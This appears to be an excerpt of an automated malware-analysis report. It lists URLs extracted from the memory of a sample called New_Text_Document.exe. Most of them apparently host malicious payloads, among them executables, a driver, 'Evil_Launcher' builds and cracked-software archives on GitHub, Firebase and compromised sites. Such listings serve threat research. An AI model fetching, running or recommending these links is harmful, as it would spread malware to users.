                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extintoresflash.cl/teci/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://famesa.com.ar/dos/gaa/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://faucetmeaning.com/wp-admin/user/setup.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fedgovt.sbs/mle/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fetchdesignprint.co.za/wp-content/themes/twentytwenty/html.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/Kj1jXnxr/download
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/distributed-eye-371713.appspot.com/o/kocJaWUbTv%2FSetup_
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/hardy-city-377704.appspot.com/o/B3WPGiNEK2%2FSetup_Win_1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/hkvihousing.appspot.com/o/jbn.txt?alt=media&token=d553bd
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/lisaza21-15605.appspot.com/o/dsc.txt?alt=media&token=e1a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/mercurial-snow-371718.appspot.com/o/tQC784YKh9%2FSetup_W
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/single-arcanum-377723.appspot.com/o/z3X15Dughi%2FInv%280
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/swift-apogee-377705.appspot.com/o/jGkurksbNk%2FContract_
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/tergd3345.appspot.com/o/ddv.txt?alt=media&token=723b871a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/tonal-depth-377622.appspot.com/o/cQtCXoljqM%2FContract_0
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/tttttttt-e4b70.appspot.com/o/new_rump_vb.net.txt?alt=med
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flamenewton.com/svchost.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://flashnewsbensedira.com/deui/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fmclog.co.uk/adcp/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fnfgroup.business/ups/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com:443;
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com:443
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://founders.net.au/bra/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofvictory.org/sp/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freaksbuzz.com/wp-content/uploads/welcome.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://free.360totalsecurity.com/totalsecurity/360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.ex
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://free.360totalsecurity.com/totalsecurity/360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.105
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freitasautocenter.com.br/als/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fynefield.com/umn/
                    Source: svchost.exe, 00000004.00000003.1241581435.000002548A059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                    Source: svchost.exe, 00000004.00000003.1241581435.000002548A000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://genena.me/tiud/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://generalserviceprovides.us/muqd/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://genericphar.com/spu/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Aztecer/dwdadawfeged23543fwgdvsg43q/raw/main/Aztec.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Aztecer/dwdadawfeged23543fwgdvsg43q/raw/main/payload.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Chelloxy/Do-not-Try-this-at-Home/raw/main/Temp1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Chelloxy/Do-not-Try-this-at-Home/raw/main/Temp2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Chelloxy/Do-not-Try-this-at-Home/raw/main/Temp3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChristopheD21/open_program/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DokleVesor/downsoftadlr/blob/main/adlightroom.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DokleVesor/downsoftcsp/blob/main/clipstudiopaint.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DokleVesor/downsoftdr18/blob/main/davinciresolve18.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Eksss112/savefreesoft/raw/3b97590ce32d41211984da2c25c06b9ed8b66b73/Savefreesoft.c
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/021273d779f6b436c72118a7b3f5f525e7f70cbf/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/0f1a6f4656a049ce3f18feab869008817e042fa1/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/115328cc356346e74a9fbd0c61c0fe7e1113e861/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/13e97b9a42f5c294a0505095840b30f63b065c85/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/22bf800f6b31b27c984ba8966b74beeedbfe9817/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/23ed3dd533bd5d9c236aca3f3e62aa25d4694faf/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/34930e3eab6e60ed244323ea7f01b6e912b6aad6/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/3ebf188c856c19f84400aad4a25dcb499646e148/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/71a421d138bff3b9949c4762a6be66a698b9367e/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/ab7d59b9c4e18e619743af6982e07f231f959678/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/ba56a9fc7729424c077c72e0165e7468504966ef/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/d2a82e650f96c75198acc9b117f3558efa2d5152/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/dddf5bdd26a2dc773aa703072c338ade0c3bbe8d/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/de039960926409bf4959ea23abf1655faa568823/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/EvilHuntersProject/Launcher/raw/f465b17a5e08b9d70d6be65f05281f1c2b7c75a9/Evil_Lau
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Fate1337pw/Fortnite/raw/main/fortnite2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Fate1337pw/Fortnite/raw/main/fortnite3.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/JackElfa/AppUnlim/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/MarkoSofts/Adobe-After-Effects-2022-1.5/blob/main/Adobe-After-Effects-2022-1.5.zi
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/MarkoSofts/Stake-Price-Prediction/blob/main/Stake%20Prediction%20(UPDATED).zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/MegaCrack1496/NewCrack/blob/main/Addobe%20Photoshop%20CRACK%202022.7z
